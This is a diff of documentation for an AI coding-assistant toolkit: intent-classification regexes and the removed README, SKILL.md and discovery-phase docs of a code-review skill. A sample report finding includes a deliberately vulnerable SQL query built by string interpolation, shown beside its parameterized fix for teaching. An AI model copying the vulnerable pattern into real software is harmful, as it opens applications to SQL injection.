/\b(integrate|集成|connect|连接|link|链接)\b/i,
|
||||
/\b(api|database|数据库|service|服务|endpoint|接口)\b/i,
|
||||
/\b(test|测试|validate|验证|coverage|覆盖)\b/i,
|
||||
/\b(multiple\s+files?|多个文件|several\s+components?|几个组件)\b/i,
|
||||
/\b(authentication|认证|authorization|授权)\b/i
|
||||
],
|
||||
weight: 1
|
||||
},
|
||||
|
||||
low: {
|
||||
patterns: [
|
||||
/\b(add|添加|create|创建|simple|简单)\b/i,
|
||||
/\b(update|更新|modify|修改|change|改变)\b/i,
|
||||
/\b(single|单个|one|一个|small|小)\b/i,
|
||||
/\b(comment|注释|log|日志|print|打印)\b/i
|
||||
],
|
||||
weight: -1
|
||||
}
|
||||
}
|
||||
|
||||
function assessComplexity(text) {
|
||||
let score = 0
|
||||
|
||||
for (const [level, config] of Object.entries(COMPLEXITY_INDICATORS)) {
|
||||
for (const pattern of config.patterns) {
|
||||
if (pattern.test(text)) {
|
||||
score += config.weight
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// File count indicator
|
||||
const fileMatches = text.match(/\b\d+\s*(files?|文件)/i)
|
||||
if (fileMatches) {
|
||||
const count = parseInt(fileMatches[0])
|
||||
if (count > 10) score += 2
|
||||
else if (count > 5) score += 1
|
||||
}
|
||||
|
||||
// Module count indicator
|
||||
const moduleMatches = text.match(/\b\d+\s*(modules?|模块)/i)
|
||||
if (moduleMatches) {
|
||||
const count = parseInt(moduleMatches[0])
|
||||
if (count > 3) score += 2
|
||||
else if (count > 1) score += 1
|
||||
}
|
||||
|
||||
if (score >= 4) return 'high'
|
||||
if (score >= 2) return 'medium'
|
||||
return 'low'
|
||||
}
|
||||
```
|
||||
|
||||
## Workflow Selection Matrix
|
||||
|
||||
| Intent | Complexity | Workflow | Commands |
|
||||
|--------|------------|----------|----------|
|
||||
| bugfix (hotfix) | * | bugfix | `lite-fix --hotfix` |
|
||||
| bugfix (standard) | * | bugfix | `lite-fix` |
|
||||
| issue | * | issue | `issue:plan → queue → execute` |
|
||||
| exploration | * | full | `brainstorm → plan → execute` |
|
||||
| ui (reference) | * | ui | `ui-design:imitate-auto → plan` |
|
||||
| ui (explore) | * | ui | `ui-design:explore-auto → plan` |
|
||||
| feature | high | coupled | `plan → verify → execute` |
|
||||
| feature | medium | rapid | `lite-plan → lite-execute` |
|
||||
| feature | low | rapid | `lite-plan → lite-execute` |
|
||||
|
||||
## Confidence Levels
|
||||
|
||||
| Level | Description | Action |
|
||||
|-------|-------------|--------|
|
||||
| **high** | Multiple strong indicators match | Direct dispatch |
|
||||
| **medium** | Some indicators match | Confirm with user |
|
||||
| **low** | Fallback classification | Always confirm |
|
||||
|
||||
## Tool Preference Detection
|
||||
|
||||
```javascript
|
||||
const TOOL_PREFERENCES = {
|
||||
gemini: {
|
||||
pattern: /用\s*gemini|gemini\s*(分析|理解|设计)|让\s*gemini/i,
|
||||
capability: 'analysis'
|
||||
},
|
||||
qwen: {
|
||||
pattern: /用\s*qwen|qwen\s*(分析|评估)|让\s*qwen/i,
|
||||
capability: 'analysis'
|
||||
},
|
||||
codex: {
|
||||
pattern: /用\s*codex|codex\s*(实现|重构|修复)|让\s*codex/i,
|
||||
capability: 'implementation'
|
||||
}
|
||||
}
|
||||
|
||||
function detectToolPreference(text) {
|
||||
for (const [tool, config] of Object.entries(TOOL_PREFERENCES)) {
|
||||
if (config.pattern.test(text)) {
|
||||
return { tool, capability: config.capability }
|
||||
}
|
||||
}
|
||||
return null
|
||||
}
|
||||
```
|
||||
|
||||
## Multi-Tool Collaboration Detection
|
||||
|
||||
```javascript
|
||||
const COLLABORATION_PATTERNS = {
|
||||
sequential: /先.*(分析|理解).*然后.*(实现|重构)|分析.*后.*实现/i,
|
||||
parallel: /(同时|并行).*(分析|实现)|一边.*一边/i,
|
||||
hybrid: /(分析|设计).*和.*(实现|测试).*分开/i
|
||||
}
|
||||
|
||||
function detectCollaboration(text) {
|
||||
if (COLLABORATION_PATTERNS.sequential.test(text)) {
|
||||
return { mode: 'sequential', description: 'Analysis first, then implementation' }
|
||||
}
|
||||
if (COLLABORATION_PATTERNS.parallel.test(text)) {
|
||||
return { mode: 'parallel', description: 'Concurrent analysis and implementation' }
|
||||
}
|
||||
if (COLLABORATION_PATTERNS.hybrid.test(text)) {
|
||||
return { mode: 'hybrid', description: 'Mixed parallel and sequential' }
|
||||
}
|
||||
return null
|
||||
}
|
||||
```
|
||||
|
||||
## Classification Pipeline
|
||||
|
||||
```javascript
|
||||
function classify(userInput) {
|
||||
const text = userInput.trim()
|
||||
|
||||
// Step 1: Check explicit commands
|
||||
if (/^\/(?:workflow|issue|memory|task):/.test(text)) {
|
||||
return { type: 'explicit', command: text }
|
||||
}
|
||||
|
||||
// Step 2: Priority-based classification
|
||||
const bugResult = detectBug(text)
|
||||
if (bugResult) return bugResult
|
||||
|
||||
const issueResult = detectIssueBatch(text)
|
||||
if (issueResult) return issueResult
|
||||
|
||||
const explorationResult = detectExploration(text)
|
||||
if (explorationResult) return explorationResult
|
||||
|
||||
const uiResult = detectUI(text)
|
||||
if (uiResult) return uiResult
|
||||
|
||||
// Step 3: Complexity-based fallback
|
||||
const complexity = assessComplexity(text)
|
||||
return {
|
||||
type: 'feature',
|
||||
complexity,
|
||||
workflow: complexity === 'high' ? 'coupled' : 'rapid',
|
||||
confidence: 'low'
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Examples
|
||||
|
||||
### Input → Classification
|
||||
|
||||
| Input | Classification | Workflow |
|
||||
|-------|----------------|----------|
|
||||
| "用户登录失败,401错误" | bugfix/standard | lite-fix |
|
||||
| "紧急:支付网关挂了" | bugfix/hotfix | lite-fix --hotfix |
|
||||
| "批量处理这些 GitHub issues" | issue | issue:plan → queue |
|
||||
| "不确定要怎么设计缓存系统" | exploration | brainstorm → plan |
|
||||
| "添加一个深色模式切换按钮" | ui | ui-design → plan |
|
||||
| "重构整个认证模块" | feature/high | plan → verify |
|
||||
| "添加用户头像功能" | feature/low | lite-plan |
|
||||
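
A quick usage sketch running the `classify()` pipeline above on English paraphrases of the table's examples; the sample strings are mine, and the outputs shown are what the regexes in this spec produce for them:

```javascript
// Sketch: exercising classify() on paraphrased example inputs.
const samples = [
  'login fails with a 401 error',
  'not sure how to design the caching layer',
  'add a user avatar feature'
]

for (const input of samples) {
  console.log(input, '→', classify(input))
}
// → { type: 'bugfix', mode: 'standard', confidence: 'high' }
// → { type: 'exploration', confidence: 'medium' }
// → { type: 'feature', complexity: 'low', workflow: 'rapid', confidence: 'low' }
```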
@@ -1,340 +0,0 @@
|
||||
# Code Reviewer Skill
|
||||
|
||||
A comprehensive code review skill for identifying security vulnerabilities and best practices violations.
|
||||
|
||||
## Overview
|
||||
|
||||
The **code-reviewer** skill provides automated code review capabilities covering:
|
||||
- **Security Analysis**: OWASP Top 10, CWE Top 25, language-specific vulnerabilities
|
||||
- **Code Quality**: Naming conventions, complexity, duplication, dead code
|
||||
- **Performance**: N+1 queries, inefficient algorithms, memory leaks
|
||||
- **Maintainability**: Documentation, test coverage, dependency health
|
||||
|
||||
## Quick Start
|
||||
|
||||
### Basic Usage
|
||||
|
||||
```bash
|
||||
# Review entire codebase
|
||||
/code-reviewer
|
||||
|
||||
# Review specific directory
|
||||
/code-reviewer --scope src/auth
|
||||
|
||||
# Focus on security only
|
||||
/code-reviewer --focus security
|
||||
|
||||
# Focus on best practices only
|
||||
/code-reviewer --focus best-practices
|
||||
```
|
||||
|
||||
### Advanced Options
|
||||
|
||||
```bash
|
||||
# Review with custom severity threshold
|
||||
/code-reviewer --severity critical,high
|
||||
|
||||
# Review specific file types
|
||||
/code-reviewer --languages typescript,python
|
||||
|
||||
# Generate detailed report
|
||||
/code-reviewer --report-level detailed
|
||||
|
||||
# Resume from previous session
|
||||
/code-reviewer --resume
|
||||
```
|
||||
|
||||
## Features
|
||||
|
||||
### Security Analysis
|
||||
|
||||
✅ **OWASP Top 10 2021 Coverage**
|
||||
- Injection vulnerabilities (SQL, Command, XSS)
|
||||
- Authentication & authorization flaws
|
||||
- Sensitive data exposure
|
||||
- Security misconfiguration
|
||||
- And more...
|
||||
|
||||
✅ **CWE Top 25 Coverage**
|
||||
- Cross-site scripting (CWE-79)
|
||||
- SQL injection (CWE-89)
|
||||
- Command injection (CWE-78)
|
||||
- Input validation (CWE-20)
|
||||
- And more...
|
||||
|
||||
✅ **Language-Specific Checks**
|
||||
- JavaScript/TypeScript: prototype pollution, eval usage
|
||||
- Python: pickle vulnerabilities, command injection
|
||||
- Java: deserialization, XXE
|
||||
- Go: race conditions, memory leaks
|
||||
|
||||
### Best Practices Review
|
||||
|
||||
✅ **Code Quality**
|
||||
- Naming convention compliance
|
||||
- Cyclomatic complexity analysis
|
||||
- Code duplication detection
|
||||
- Dead code identification
|
||||
|
||||
✅ **Performance**
|
||||
- N+1 query detection
|
||||
- Inefficient algorithm patterns
|
||||
- Memory leak detection
|
||||
- Resource cleanup verification
|
||||
|
||||
✅ **Maintainability**
|
||||
- Documentation coverage
|
||||
- Test coverage analysis
|
||||
- Dependency health check
|
||||
- Error handling review
|
||||
|
||||
## Output
|
||||
|
||||
The skill generates comprehensive reports in `.code-review/` directory:
|
||||
|
||||
```
|
||||
.code-review/
|
||||
├── inventory.json # File inventory with metadata
|
||||
├── security-findings.json # Security vulnerabilities
|
||||
├── best-practices-findings.json # Best practices violations
|
||||
├── summary.json # Summary statistics
|
||||
├── REPORT.md # Comprehensive markdown report
|
||||
└── FIX-CHECKLIST.md # Actionable fix checklist
|
||||
```
|
||||
|
||||
### Report Contents
|
||||
|
||||
**REPORT.md** includes:
|
||||
- Executive summary with risk assessment
|
||||
- Quality scores (Security, Code Quality, Performance, Maintainability)
|
||||
- Detailed findings organized by severity
|
||||
- Code examples with fix recommendations
|
||||
- Action plan prioritized by urgency
|
||||
- Compliance status (PCI DSS, HIPAA, GDPR, SOC 2)
|
||||
|
||||
**FIX-CHECKLIST.md** provides:
|
||||
- Checklist format for tracking fixes
|
||||
- Organized by severity (Critical → Low)
|
||||
- Effort estimates for each issue
|
||||
- Priority assignments
|
||||
|
||||
## Configuration
|
||||
|
||||
Create `.code-reviewer.json` in project root:
|
||||
|
||||
```json
|
||||
{
|
||||
"scope": {
|
||||
"include": ["src/**/*", "lib/**/*"],
|
||||
"exclude": ["**/*.test.ts", "**/*.spec.ts", "**/node_modules/**"]
|
||||
},
|
||||
"security": {
|
||||
"enabled": true,
|
||||
"checks": ["owasp-top-10", "cwe-top-25"],
|
||||
"severity_threshold": "medium"
|
||||
},
|
||||
"best_practices": {
|
||||
"enabled": true,
|
||||
"code_quality": true,
|
||||
"performance": true,
|
||||
"maintainability": true
|
||||
},
|
||||
"reporting": {
|
||||
"format": "markdown",
|
||||
"output_path": ".code-review/",
|
||||
"include_snippets": true,
|
||||
"include_fixes": true
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Workflow
|
||||
|
||||
### Phase 1: Code Discovery
|
||||
- Discover and categorize code files
|
||||
- Extract metadata (LOC, complexity, framework)
|
||||
- Prioritize files (Critical, High, Medium, Low)
|
||||
|
||||
### Phase 2: Security Analysis
|
||||
- Scan for OWASP Top 10 vulnerabilities
|
||||
- Check CWE Top 25 weaknesses
|
||||
- Apply language-specific security patterns
|
||||
- Generate security findings
|
||||
|
||||
### Phase 3: Best Practices Review
|
||||
- Analyze code quality issues
|
||||
- Detect performance problems
|
||||
- Assess maintainability concerns
|
||||
- Generate best practices findings
|
||||
|
||||
### Phase 4: Report Generation
|
||||
- Consolidate all findings
|
||||
- Calculate quality scores
|
||||
- Generate comprehensive reports
|
||||
- Create actionable checklists
|
||||
|
||||
## Integration
|
||||
|
||||
### Pre-commit Hook
|
||||
|
||||
Block commits with critical/high issues:
|
||||
|
||||
```bash
|
||||
#!/bin/bash
|
||||
# .git/hooks/pre-commit
|
||||
|
||||
staged_files=$(git diff --cached --name-only --diff-filter=ACMR)
|
||||
ccw run code-reviewer --scope "$staged_files" --severity critical,high
|
||||
|
||||
if [ $? -ne 0 ]; then
|
||||
echo "❌ Code review found critical/high issues. Commit aborted."
|
||||
exit 1
|
||||
fi
|
||||
```
|
||||
|
||||
### CI/CD Integration
|
||||
|
||||
```yaml
|
||||
# .github/workflows/code-review.yml
|
||||
name: Code Review
|
||||
on: [pull_request]
|
||||
|
||||
jobs:
|
||||
review:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v3
|
||||
- name: Run Code Review
|
||||
run: |
|
||||
ccw run code-reviewer --report-level detailed
|
||||
ccw report upload .code-review/report.md
|
||||
```
|
||||
|
||||
## Examples
|
||||
|
||||
### Example 1: Security-Focused Review
|
||||
|
||||
```bash
|
||||
# Review authentication module for security issues
|
||||
/code-reviewer --scope src/auth --focus security --severity critical,high
|
||||
```
|
||||
|
||||
**Output**: Security findings with OWASP/CWE mappings and fix recommendations
|
||||
|
||||
### Example 2: Performance Review
|
||||
|
||||
```bash
|
||||
# Review API endpoints for performance issues
|
||||
/code-reviewer --scope src/api --focus best-practices --check performance
|
||||
```
|
||||
|
||||
**Output**: N+1 queries, inefficient algorithms, memory leak detections
|
||||
|
||||
### Example 3: Full Project Audit
|
||||
|
||||
```bash
|
||||
# Comprehensive review of entire codebase
|
||||
/code-reviewer --report-level detailed --output .code-review/audit-2024-01.md
|
||||
```
|
||||
|
||||
**Output**: Complete audit with all findings, scores, and action plan
|
||||
|
||||
## Compliance Support
|
||||
|
||||
The skill maps findings to compliance requirements:
|
||||
|
||||
- **PCI DSS**: Requirement 6.5 (Common coding vulnerabilities)
|
||||
- **HIPAA**: Technical safeguards and access controls
|
||||
- **GDPR**: Article 32 (Security of processing)
|
||||
- **SOC 2**: Security controls and monitoring
|
||||
|
||||
## Architecture
|
||||
|
||||
### Execution Mode
|
||||
**Sequential** - Fixed phase order for systematic review:
|
||||
1. Code Discovery → 2. Security Analysis → 3. Best Practices → 4. Report Generation
|
||||
|
||||
### Tools Used
|
||||
- `mcp__ace-tool__search_context` - Semantic code search
|
||||
- `mcp__ccw-tools__smart_search` - Pattern matching
|
||||
- `Read` - File content access
|
||||
- `Write` - Report generation
|
||||
|
||||
## Quality Standards
|
||||
|
||||
### Scoring System
|
||||
|
||||
```
|
||||
Overall Score = (
|
||||
Security Score × 0.4 +
|
||||
Code Quality Score × 0.25 +
|
||||
Performance Score × 0.2 +
|
||||
Maintainability Score × 0.15
|
||||
)
|
||||
```
|
||||
|
||||
### Score Ranges
|
||||
- **A (90-100)**: Excellent - Production ready
|
||||
- **B (80-89)**: Good - Minor improvements needed
|
||||
- **C (70-79)**: Acceptable - Some issues to address
|
||||
- **D (60-69)**: Poor - Significant improvements required
|
||||
- **F (0-59)**: Failing - Major issues, not production ready
|
||||
|
||||
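
Putting the weighted formula and the score ranges above together; the field and function names here are illustrative, not part of the skill's API:

```javascript
// Sketch: compute the overall score and map it to a letter grade.
function overallScore({ security, codeQuality, performance, maintainability }) {
  return security * 0.4 + codeQuality * 0.25 + performance * 0.2 + maintainability * 0.15
}

function grade(score) {
  if (score >= 90) return 'A'
  if (score >= 80) return 'B'
  if (score >= 70) return 'C'
  if (score >= 60) return 'D'
  return 'F'
}

// grade(overallScore({ security: 70, codeQuality: 85, performance: 90, maintainability: 80 }))
// → overall 79.25 → 'C'
```
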
## Troubleshooting
|
||||
|
||||
### Large Codebase
|
||||
|
||||
If review takes too long:
|
||||
```bash
|
||||
# Review in batches
|
||||
/code-reviewer --scope src/module-1
|
||||
/code-reviewer --scope src/module-2 --resume
|
||||
|
||||
# Or use parallel execution
|
||||
/code-reviewer --parallel 4
|
||||
```
|
||||
|
||||
### False Positives
|
||||
|
||||
Configure suppressions in `.code-reviewer.json`:
|
||||
```json
|
||||
{
|
||||
"suppressions": {
|
||||
"security": {
|
||||
"sql-injection": {
|
||||
"paths": ["src/legacy/**/*"],
|
||||
"reason": "Legacy code, scheduled for refactor"
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## File Structure
|
||||
|
||||
```
|
||||
.claude/skills/code-reviewer/
|
||||
├── SKILL.md # Main skill documentation
|
||||
├── README.md # This file
|
||||
├── phases/
|
||||
│ ├── 01-code-discovery.md
|
||||
│ ├── 02-security-analysis.md
|
||||
│ ├── 03-best-practices-review.md
|
||||
│ └── 04-report-generation.md
|
||||
├── specs/
|
||||
│ ├── security-requirements.md
|
||||
│ ├── best-practices-requirements.md
|
||||
│ └── quality-standards.md
|
||||
└── templates/
|
||||
├── security-finding.md
|
||||
├── best-practice-finding.md
|
||||
└── report-template.md
|
||||
```
|
||||
|
||||
## Version
|
||||
|
||||
**v1.0.0** - Initial release
|
||||
|
||||
## License
|
||||
|
||||
MIT License
|
||||
@@ -1,308 +0,0 @@
|
||||
---
|
||||
name: code-reviewer
|
||||
description: Comprehensive code review skill for identifying security vulnerabilities and best practices violations. Triggers on "code review", "review code", "security audit", "代码审查".
|
||||
allowed-tools: Read, Glob, Grep, mcp__ace-tool__search_context, mcp__ccw-tools__smart_search
|
||||
---
|
||||
|
||||
# Code Reviewer
|
||||
|
||||
Comprehensive code review skill for identifying security vulnerabilities and best practices violations.
|
||||
|
||||
## Architecture Overview
|
||||
|
||||
```
|
||||
┌─────────────────────────────────────────────────────────────────┐
|
||||
│ Code Reviewer Workflow │
|
||||
├─────────────────────────────────────────────────────────────────┤
|
||||
│ │
|
||||
│ Phase 1: Code Discovery → 发现待审查的代码文件 │
|
||||
│ & Scoping - 根据语言/框架识别文件 │
|
||||
│ ↓ - 设置审查范围和优先级 │
|
||||
│ │
|
||||
│ Phase 2: Security → 安全漏洞扫描 │
|
||||
│ Analysis - OWASP Top 10 检查 │
|
||||
│ ↓ - 常见漏洞模式识别 │
|
||||
│ - 敏感数据泄露检查 │
|
||||
│ │
|
||||
│ Phase 3: Best Practices → 最佳实践审查 │
|
||||
│ Review - 代码质量检查 │
|
||||
│ ↓ - 性能优化建议 │
|
||||
│ - 可维护性评估 │
|
||||
│ │
|
||||
│ Phase 4: Report → 生成审查报告 │
|
||||
│ Generation - 按严重程度分类问题 │
|
||||
│ - 提供修复建议和示例 │
|
||||
│ - 生成可追踪的修复清单 │
|
||||
│ │
|
||||
└─────────────────────────────────────────────────────────────────┘
|
||||
```
|
||||
|
||||
## Features
|
||||
|
||||
### Security Analysis
|
||||
|
||||
- **OWASP Top 10 Coverage**
|
||||
- Injection vulnerabilities (SQL, Command, LDAP)
|
||||
- Authentication & authorization bypass
|
||||
- Sensitive data exposure
|
||||
- XML External Entities (XXE)
|
||||
- Broken access control
|
||||
- Security misconfiguration
|
||||
- Cross-Site Scripting (XSS)
|
||||
- Insecure deserialization
|
||||
- Components with known vulnerabilities
|
||||
- Insufficient logging & monitoring
|
||||
|
||||
- **Language-Specific Checks**
|
||||
- JavaScript/TypeScript: prototype pollution, eval usage
|
||||
- Python: pickle vulnerabilities, command injection
|
||||
- Java: deserialization, path traversal
|
||||
- Go: race conditions, memory leaks
|
||||
|
||||
### Best Practices Review
|
||||
|
||||
- **Code Quality**
|
||||
- Naming conventions
|
||||
- Function complexity (cyclomatic complexity)
|
||||
- Code duplication
|
||||
- Dead code detection
|
||||
|
||||
- **Performance**
|
||||
- N+1 queries
|
||||
- Inefficient algorithms
|
||||
- Memory leaks
|
||||
- Resource cleanup
|
||||
|
||||
- **Maintainability**
|
||||
- Documentation quality
|
||||
- Test coverage
|
||||
- Error handling patterns
|
||||
- Dependency management
|
||||
|
||||
## Usage
|
||||
|
||||
### Basic Review
|
||||
|
||||
```bash
|
||||
# Review entire codebase
|
||||
/code-reviewer
|
||||
|
||||
# Review specific directory
|
||||
/code-reviewer --scope src/auth
|
||||
|
||||
# Focus on security only
|
||||
/code-reviewer --focus security
|
||||
|
||||
# Focus on best practices only
|
||||
/code-reviewer --focus best-practices
|
||||
```
|
||||
|
||||
### Advanced Options
|
||||
|
||||
```bash
|
||||
# Review with custom severity threshold
|
||||
/code-reviewer --severity critical,high
|
||||
|
||||
# Review specific file types
|
||||
/code-reviewer --languages typescript,python
|
||||
|
||||
# Generate detailed report with code snippets
|
||||
/code-reviewer --report-level detailed
|
||||
|
||||
# Resume from previous session
|
||||
/code-reviewer --resume
|
||||
```
|
||||
|
||||
## Configuration
|
||||
|
||||
Create `.code-reviewer.json` in project root:
|
||||
|
||||
```json
|
||||
{
|
||||
"scope": {
|
||||
"include": ["src/**/*", "lib/**/*"],
|
||||
"exclude": ["**/*.test.ts", "**/*.spec.ts", "**/node_modules/**"]
|
||||
},
|
||||
"security": {
|
||||
"enabled": true,
|
||||
"checks": ["owasp-top-10", "cwe-top-25"],
|
||||
"severity_threshold": "medium"
|
||||
},
|
||||
"best_practices": {
|
||||
"enabled": true,
|
||||
"code_quality": true,
|
||||
"performance": true,
|
||||
"maintainability": true
|
||||
},
|
||||
"reporting": {
|
||||
"format": "markdown",
|
||||
"output_path": ".code-review/",
|
||||
"include_snippets": true,
|
||||
"include_fixes": true
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Output
|
||||
|
||||
### Review Report Structure
|
||||
|
||||
```markdown
|
||||
# Code Review Report
|
||||
|
||||
## Executive Summary
|
||||
- Total Issues: 42
|
||||
- Critical: 3
|
||||
- High: 8
|
||||
- Medium: 15
|
||||
- Low: 16
|
||||
|
||||
## Security Findings
|
||||
|
||||
### [CRITICAL] SQL Injection in User Query
|
||||
**File**: src/auth/user-service.ts:145
|
||||
**Issue**: Unsanitized user input in SQL query
|
||||
**Fix**: Use parameterized queries
|
||||
|
||||
Code Snippet:
|
||||
\`\`\`typescript
|
||||
// ❌ Vulnerable
|
||||
const query = `SELECT * FROM users WHERE username = '${username}'`;
|
||||
|
||||
// ✅ Fixed
|
||||
const query = 'SELECT * FROM users WHERE username = ?';
|
||||
db.execute(query, [username]);
|
||||
\`\`\`
|
||||
|
||||
## Best Practices Findings
|
||||
|
||||
### [MEDIUM] High Cyclomatic Complexity
|
||||
**File**: src/utils/validator.ts:78
|
||||
**Issue**: Function has complexity score of 15 (threshold: 10)
|
||||
**Fix**: Break into smaller functions
|
||||
|
||||
...
|
||||
```
|
||||
|
||||
## Phase Documentation
|
||||
|
||||
| Phase | Description | Output |
|
||||
|-------|-------------|--------|
|
||||
| [01-code-discovery.md](phases/01-code-discovery.md) | Discover and categorize code files | File inventory with metadata |
|
||||
| [02-security-analysis.md](phases/02-security-analysis.md) | Analyze security vulnerabilities | Security findings list |
|
||||
| [03-best-practices-review.md](phases/03-best-practices-review.md) | Review code quality and practices | Best practices findings |
|
||||
| [04-report-generation.md](phases/04-report-generation.md) | Generate comprehensive report | Markdown report |
|
||||
|
||||
## Specifications
|
||||
|
||||
- [specs/security-requirements.md](specs/security-requirements.md) - Security check specifications
|
||||
- [specs/best-practices-requirements.md](specs/best-practices-requirements.md) - Best practices standards
|
||||
- [specs/quality-standards.md](specs/quality-standards.md) - Overall quality standards
|
||||
- [specs/severity-classification.md](specs/severity-classification.md) - Issue severity criteria
|
||||
|
||||
## Templates
|
||||
|
||||
- [templates/security-finding.md](templates/security-finding.md) - Security finding template
|
||||
- [templates/best-practice-finding.md](templates/best-practice-finding.md) - Best practice finding template
|
||||
- [templates/report-template.md](templates/report-template.md) - Final report template
|
||||
|
||||
## Integration with Development Workflow
|
||||
|
||||
### Pre-commit Hook
|
||||
|
||||
```bash
|
||||
#!/bin/bash
|
||||
# .git/hooks/pre-commit
|
||||
|
||||
# Run code review on staged files
|
||||
staged_files=$(git diff --cached --name-only --diff-filter=ACMR)
|
||||
ccw run code-reviewer --scope "$staged_files" --severity critical,high
|
||||
|
||||
if [ $? -ne 0 ]; then
|
||||
echo "❌ Code review found critical/high issues. Commit aborted."
|
||||
exit 1
|
||||
fi
|
||||
```
|
||||
|
||||
### CI/CD Integration
|
||||
|
||||
```yaml
|
||||
# .github/workflows/code-review.yml
|
||||
name: Code Review
|
||||
on: [pull_request]
|
||||
|
||||
jobs:
|
||||
review:
|
||||
runs-on: ubuntu-latest
|
||||
steps:
|
||||
- uses: actions/checkout@v3
|
||||
- name: Run Code Review
|
||||
run: |
|
||||
ccw run code-reviewer --report-level detailed
|
||||
ccw report upload .code-review/report.md
|
||||
```
|
||||
|
||||
## Examples
|
||||
|
||||
### Example 1: Security-Focused Review
|
||||
|
||||
```bash
|
||||
# Review authentication module for security issues
|
||||
/code-reviewer --scope src/auth --focus security --severity critical,high
|
||||
```
|
||||
|
||||
### Example 2: Performance Review
|
||||
|
||||
```bash
|
||||
# Review API endpoints for performance issues
|
||||
/code-reviewer --scope src/api --focus best-practices --check performance
|
||||
```
|
||||
|
||||
### Example 3: Full Project Audit
|
||||
|
||||
```bash
|
||||
# Comprehensive review of entire codebase
|
||||
/code-reviewer --report-level detailed --output .code-review/audit-2024-01.md
|
||||
```
|
||||
|
||||
## Troubleshooting
|
||||
|
||||
### Large Codebase
|
||||
|
||||
If review takes too long:
|
||||
```bash
|
||||
# Review in batches
|
||||
/code-reviewer --scope src/module-1
|
||||
/code-reviewer --scope src/module-2 --resume
|
||||
|
||||
# Or use parallel execution
|
||||
/code-reviewer --parallel 4
|
||||
```
|
||||
|
||||
### False Positives
|
||||
|
||||
Configure suppressions in `.code-reviewer.json`:
|
||||
```json
|
||||
{
|
||||
"suppressions": {
|
||||
"security": {
|
||||
"sql-injection": {
|
||||
"paths": ["src/legacy/**/*"],
|
||||
"reason": "Legacy code, scheduled for refactor"
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
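
A hedged sketch of how these suppressions might be applied when findings are aggregated; the finding shape (`ruleId`, `file`) is an assumption, and `minimatch(file, glob)` mirrors the pattern matching used in the Phase 1 discovery code:

```javascript
// Sketch: drop findings whose rule is suppressed for the file's path.
function applySuppressions(findings, suppressions = {}) {
  return findings.filter(finding => {
    const rule = suppressions.security?.[finding.ruleId]
    if (!rule) return true                                           // nothing suppressed for this rule
    const suppressed = rule.paths.some(glob => minimatch(finding.file, glob))
    if (suppressed) console.log(`Suppressed ${finding.ruleId} in ${finding.file}: ${rule.reason}`)
    return !suppressed
  })
}
```
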
## Roadmap
|
||||
|
||||
- [ ] AI-powered vulnerability detection
|
||||
- [ ] Integration with popular security scanners (Snyk, SonarQube)
|
||||
- [ ] Automated fix suggestions with diffs
|
||||
- [ ] IDE plugins for real-time feedback
|
||||
- [ ] Custom rule engine for organization-specific policies
|
||||
|
||||
## License
|
||||
|
||||
MIT License - See LICENSE file for details
|
||||
@@ -1,246 +0,0 @@
|
||||
# Phase 1: Code Discovery & Scoping
|
||||
|
||||
## Objective
|
||||
|
||||
Discover and categorize all code files within the specified scope, preparing them for security analysis and best practices review.
|
||||
|
||||
## Input
|
||||
|
||||
- **User Arguments**:
|
||||
- `--scope`: Directory or file patterns (default: entire project)
|
||||
- `--languages`: Specific languages to review (e.g., typescript, python, java)
|
||||
- `--exclude`: Patterns to exclude (e.g., test files, node_modules)
|
||||
|
||||
- **Configuration**: `.code-reviewer.json` (if exists)
|
||||
|
||||
## Process
|
||||
|
||||
### Step 1: Load Configuration
|
||||
|
||||
```javascript
|
||||
// Check for project-level configuration
|
||||
const configPath = path.join(projectRoot, '.code-reviewer.json');
|
||||
const config = fileExists(configPath)
|
||||
? JSON.parse(readFile(configPath))
|
||||
: getDefaultConfig();
|
||||
|
||||
// Merge user arguments with config
|
||||
const scope = args.scope || config.scope.include;
|
||||
const exclude = args.exclude || config.scope.exclude;
|
||||
const languages = args.languages || config.languages || 'auto';
|
||||
```
|
||||
|
||||
### Step 2: Discover Files
|
||||
|
||||
Use MCP tools for efficient file discovery:
|
||||
|
||||
```javascript
|
||||
// Use smart_search for file discovery
|
||||
const files = await mcp__ccw_tools__smart_search({
|
||||
action: "find_files",
|
||||
pattern: scope,
|
||||
includeHidden: false
|
||||
});
|
||||
|
||||
// Apply exclusion patterns
|
||||
const filteredFiles = files.filter(file => {
|
||||
return !exclude.some(pattern => minimatch(file, pattern));
|
||||
});
|
||||
```
|
||||
|
||||
### Step 3: Categorize Files
|
||||
|
||||
Categorize files by:
|
||||
- **Language/Framework**: TypeScript, Python, Java, Go, etc.
|
||||
- **File Type**: Source, config, test, build
|
||||
- **Priority**: Critical (auth, payment), High (API), Medium (utils), Low (docs)
|
||||
|
||||
```javascript
|
||||
const inventory = {
|
||||
critical: {
|
||||
auth: ['src/auth/login.ts', 'src/auth/jwt.ts'],
|
||||
payment: ['src/payment/stripe.ts'],
|
||||
},
|
||||
high: {
|
||||
api: ['src/api/users.ts', 'src/api/orders.ts'],
|
||||
database: ['src/db/queries.ts'],
|
||||
},
|
||||
medium: {
|
||||
utils: ['src/utils/validator.ts'],
|
||||
services: ['src/services/*.ts'],
|
||||
},
|
||||
low: {
|
||||
types: ['src/types/*.ts'],
|
||||
}
|
||||
};
|
||||
```
|
||||
|
||||
### Step 4: Extract Metadata
|
||||
|
||||
For each file, extract:
|
||||
- **Lines of Code (LOC)**
|
||||
- **Complexity Indicators**: Function count, class count
|
||||
- **Dependencies**: Import statements
|
||||
- **Framework Detection**: Express, React, Django, etc.
|
||||
|
||||
```javascript
|
||||
const metadata = files.map(file => ({
|
||||
path: file,
|
||||
language: detectLanguage(file),
|
||||
loc: countLines(file),
|
||||
complexity: estimateComplexity(file),
|
||||
framework: detectFramework(file),
|
||||
priority: categorizePriority(file)
|
||||
}));
|
||||
```
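The snippet above calls helpers such as `detectLanguage` and `categorizePriority` without defining them. A minimal sketch of what they might look like, assuming extension-based language detection and path-based priority rules (both hypothetical implementations, not part of the skill):

```typescript
// Hypothetical helpers referenced by the metadata extraction step above.
const LANGUAGE_BY_EXT: Record<string, string> = {
  '.ts': 'typescript', '.tsx': 'typescript',
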